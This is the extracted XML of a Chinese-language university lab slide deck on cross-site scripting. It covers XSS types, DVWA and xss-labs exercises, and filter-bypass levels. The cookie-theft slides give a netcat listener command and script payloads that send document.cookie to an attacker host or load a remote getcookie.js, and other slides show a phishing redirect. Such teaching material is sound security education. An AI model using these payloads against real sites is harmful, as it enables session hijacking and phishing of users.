              <a:t>，可以看到使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>htmlspecialchars</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>函数对参数进行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>实体转义，此时就无法利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>漏洞了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3E2B66-65AF-FB12-8ADB-E4EBBC56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4" y="2318722"/>
            <a:ext cx="74295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1E648-DFEF-570B-2B32-EE62CD1C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反射型</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>XSS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E938F-8FC2-9543-1C68-2647EFE3B5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反射型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DOM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>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存储型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3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Cookies </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>窃取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在主机上开启监听</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Nc -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>nvlp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> 80</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>设置为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>low</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，输入如下内容</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>&lt;script&gt;new Image().</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>=“http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>主机</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>IP/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>a.php?output</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>="+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>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1683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Cookies </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>窃取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此时可以在主机上获得</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>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A41FF5-7DF0-E537-F23A-2FFED943E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55" y="2351107"/>
            <a:ext cx="64484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加载远程</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>js</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>脚本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在远端服务器上制作一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>js</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>脚本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搭建站点</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>把</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>js</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>脚本放入到站点中，开启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init.d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>/apache2 start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js</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>脚本中的主机上开启监听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4D2262-BBA3-B88F-6F4B-FE193625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0" y="1863260"/>
            <a:ext cx="5279594" cy="6767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69DF0E-4630-8497-F97E-C87EF2E4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60" y="4565742"/>
            <a:ext cx="5279594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加载远程</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>js</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>脚本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DVWA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>中输入如下内容</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>&lt;script </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>=‘http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>主机</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>IP/getcookie.js'&gt;&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>在主机</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>查看</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>js</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>脚本实现的结果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C4CA26-22AF-D58B-4D2F-1AEEA3E2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48" y="3218873"/>
            <a:ext cx="5279594" cy="23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重定向钓鱼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安全级别设置为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>low</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>把当前页面重定向到一个钓鱼页面，例如重定向到百度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&lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>document.location.href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>="https://www.baidu.com"&lt;/script&gt;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04EFD7-C847-2A72-E386-812CFA55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0" y="2781577"/>
            <a:ext cx="5820389" cy="32003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D075AFC-6CC9-1DF6-9C1B-C1081416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22" y="2781578"/>
            <a:ext cx="4515854" cy="325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重定向钓鱼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Message</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>栏有长度限制，需要修改长度大小绕过限制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7E35A6-ED61-2524-6CCD-0E9C1E14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4" y="1593702"/>
            <a:ext cx="6031231" cy="45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0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1E648-DFEF-570B-2B32-EE62CD1C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反射型</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>XSS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E938F-8FC2-9543-1C68-2647EFE3B5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effectLst/>
                <a:latin typeface="Noto Sans" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>反射型跨站脚本（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Noto Sans" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Reflected Cross-Site Scripting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Noto Sans" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>）是最常见，也是使用最广的一种，可将恶意脚本附加到 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Noto Sans" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>URL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Noto Sans" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>地址的参数中。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Noto Sans" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>反射型 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Noto Sans" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>XSS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Noto Sans" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>的利用一般是攻击者通过特定手法（如电子邮件），诱使用户去访问一个包含恶意代码的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Noto Sans" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Noto Sans" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>，当受害者点击这些专门设计的链接的时候，恶意代码会直接在受害者主机上的浏览器执行。此类 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Noto Sans" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>XSS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Noto Sans" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>通常出现在网站的搜索栏、用户登录口等地方，常用来窃取客户端 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Noto Sans" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Cookies </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Noto Sans" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>或进行钓鱼欺骗。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75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1E648-DFEF-570B-2B32-EE62CD1C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持久型</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>XSS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E938F-8FC2-9543-1C68-2647EFE3B5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effectLst/>
                <a:latin typeface="Noto Sans" panose="020B0502040504020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>持久型跨站脚本（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Persistent Cross-Site Scripting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）也等同于存储型跨站脚本（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Stored Cross-Site Scripting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）。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Noto Sans" panose="020B0502040504020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>此类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XSS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不需要用户单击特定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URL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就能执行跨站脚本，攻击者事先将恶意代码上传或储存到漏洞服务器中，只要受害者浏览包含此恶意代码的页面就会执行恶意代码。持久型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XSS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一般出现在网站留言、评论、博客日志等交互处，恶意脚本存储到客户端或者服务端的数据库中。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678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1E648-DFEF-570B-2B32-EE62CD1C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DOM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>型</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>XSS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E938F-8FC2-9543-1C68-2647EFE3B5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effectLst/>
                <a:latin typeface="Noto Sans" panose="020B0502040504020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>传统的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XSS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漏洞一般出现在服务器端代码中，而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DOM-Based XSS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是基于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DOM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文档对象模型的一种漏洞，所以，受客户端浏览器的脚本代码所影响。客户端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JavaScript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可以访问浏览器的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DOM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文本对象模型，因此能够决定用于加载当前页面的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URL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。换句话说，客户端的脚本程序可以通过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DOM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动态地检查和修改页面内容，它不依赖于服务器端的数据，而从客户端获得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DOM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中的数据（如从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URL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中提取数据）并在本地执行。另一方面，浏览器用户可以操纵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DOM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中的一些对象，例如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URL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、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location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等。用户在客户端输入的数据如果包含了恶意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JavaScript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脚本，而这些脚本没有经过适当的过滤和消毒，那么应用程序就可能受到基于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DOM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的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Noto Sans" panose="020B0502040504020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>XSS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Noto Sans" panose="020B0502040504020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>攻击。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265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XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>注入技巧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81F01B-7CFF-D171-9815-F66FC3BA62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2" y="1383506"/>
            <a:ext cx="11046251" cy="2045494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b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CA0C16"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
                <a:hlinkClick r:id="rId2" tooltip="https://github.com/do0dl3/xss-labs"/>
              </a:rPr>
              <a:t>https://github.com/do0dl3/xss-labs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>上的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>xss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>靶场</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>部分使用了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>Burpsite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197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level1-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>无过滤直接注入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F0F5AD-CEEA-4A33-AA2C-AF34D9EC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61" y="861070"/>
            <a:ext cx="7813078" cy="23131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0199E55-032A-70FF-D28D-7ACAA53DEAE5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1681843" y="3499139"/>
            <a:ext cx="799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可以看到网页把</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>参数填入元素中，直接输入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>&lt;script&gt;alert()&lt;/script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>后有以下显示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7E53D6-E496-2A87-BBF0-9AF9DE4A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391" y="4290832"/>
            <a:ext cx="7553018" cy="15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CBE28-FA8A-5808-E62D-2CF808F9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level1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0199E55-032A-70FF-D28D-7ACAA53DEAE5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1415142" y="4288352"/>
            <a:ext cx="856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再看网页的源码，可以看到没有对</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>参数进行任何过滤就直接传入元素中了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EB756-6A7D-D357-402C-37BB6066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41" y="1697257"/>
            <a:ext cx="6346871" cy="17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7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交大1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交大1" id="{F0224602-5B7C-4993-B2F8-83676F43361C}" vid="{D8905876-6B5E-4FC0-9CDD-506DE227A33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交大1</Template>
  <TotalTime>1964</TotalTime>
  <Words>1308</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>宽屏</PresentationFormat>
  <Paragraphs>109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-apple-system</vt:lpstr>
      <vt:lpstr>HarmonyOS Sans SC Black</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Lato</vt:lpstr>
      <vt:lpstr>Noto Sans</vt:lpstr>
      <vt:lpstr>Segoe UI</vt:lpstr>
      <vt:lpstr>交大1</vt:lpstr>
      <vt:lpstr>XSS跨站脚本攻击实验</vt:lpstr>
      <vt:lpstr>XSS简介</vt:lpstr>
      <vt:lpstr>反射型XSS</vt:lpstr>
      <vt:lpstr>反射型XSS</vt:lpstr>
      <vt:lpstr>持久型XSS</vt:lpstr>
      <vt:lpstr>DOM型XSS</vt:lpstr>
      <vt:lpstr>XSS注入技巧</vt:lpstr>
      <vt:lpstr>level1-无过滤直接注入</vt:lpstr>
      <vt:lpstr>level1</vt:lpstr>
      <vt:lpstr>Level2-闭合</vt:lpstr>
      <vt:lpstr>Level3-利用onfocus属性进行XSS攻击</vt:lpstr>
      <vt:lpstr>Level4-利用&lt;a&gt;进行xss攻击</vt:lpstr>
      <vt:lpstr>XSS常见的触发标签</vt:lpstr>
      <vt:lpstr>Level5-利用大小写绕过XSS过滤</vt:lpstr>
      <vt:lpstr>Level6-利用重复拼写绕过进行XSS过滤</vt:lpstr>
      <vt:lpstr>Level7-利用编码绕过防御</vt:lpstr>
      <vt:lpstr>Level7-利用编码绕过防御</vt:lpstr>
      <vt:lpstr>Level7-利用编码绕过防御</vt:lpstr>
      <vt:lpstr>Level8-利用注释绕过防御</vt:lpstr>
      <vt:lpstr>Level9-利用隐式传参进行攻击</vt:lpstr>
      <vt:lpstr>Level10-利用Burpusite拦截数据包</vt:lpstr>
      <vt:lpstr>level10</vt:lpstr>
      <vt:lpstr>Level11-修改cookie值</vt:lpstr>
      <vt:lpstr>Cookies 窃取 </vt:lpstr>
      <vt:lpstr>Cookies 窃取 </vt:lpstr>
      <vt:lpstr>Cookies 窃取 </vt:lpstr>
      <vt:lpstr>Cookies 窃取 </vt:lpstr>
      <vt:lpstr>Cookies 窃取 </vt:lpstr>
      <vt:lpstr>Cookies 窃取 </vt:lpstr>
      <vt:lpstr>Cookies 窃取 </vt:lpstr>
      <vt:lpstr>Cookies 窃取 </vt:lpstr>
      <vt:lpstr>加载远程js脚本</vt:lpstr>
      <vt:lpstr>加载远程js脚本</vt:lpstr>
      <vt:lpstr>重定向钓鱼</vt:lpstr>
      <vt:lpstr>重定向钓鱼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XSS</dc:title>
  <dc:creator>李 吴涛</dc:creator>
  <cp:lastModifiedBy>CSD SJTU</cp:lastModifiedBy>
  <cp:revision>60</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-04-20T08:54:19Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-08-19T08:08:05Z</dcterms:modified>
</cp:coreProperties>
</file>